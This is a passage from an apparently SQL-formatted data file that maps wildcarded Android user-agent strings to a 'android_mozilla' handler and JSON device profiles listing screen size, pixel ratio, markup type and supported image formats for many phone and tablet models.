Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5034D_RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5041C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5052A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5052D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5052D_RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5052Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5059A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5059D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5059D_RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5059I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5059J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5059T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5059X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5059Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5059Z) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5060A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5060D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5060D_RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5063) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 506SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 507SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5099A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5099D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5099D_RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5099U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5099Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5133A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5159A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5159J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5199I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5501) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 5EQ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 602SO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 603SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 605SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 6062W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 6AS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 701SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 701SO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 702SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 702SO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 704HW) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 704KC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 704SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 705KC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 706SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 8068_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"pixelRatio\":1,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 8082_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 850_4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 9027W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 9027X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 9027X_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; A0001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; A1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; A10_Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; A10_Lite_2019) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; A10_Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; A140) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; A150) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; A1_PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; A20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; A20Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; A240) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; A250) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; A3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; A30) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":755,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; A30-RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":755,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; A3_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":756,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; A4_Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; A4_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":756,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; A5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; A502DL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; A511 Harmony) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; A512 Harmony Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; A60) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; A9_Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AGM A9 xx) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AGM A9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AGM X3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AGS-W09) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AGS2-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AGS2-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AGS2-W09) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AL140) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 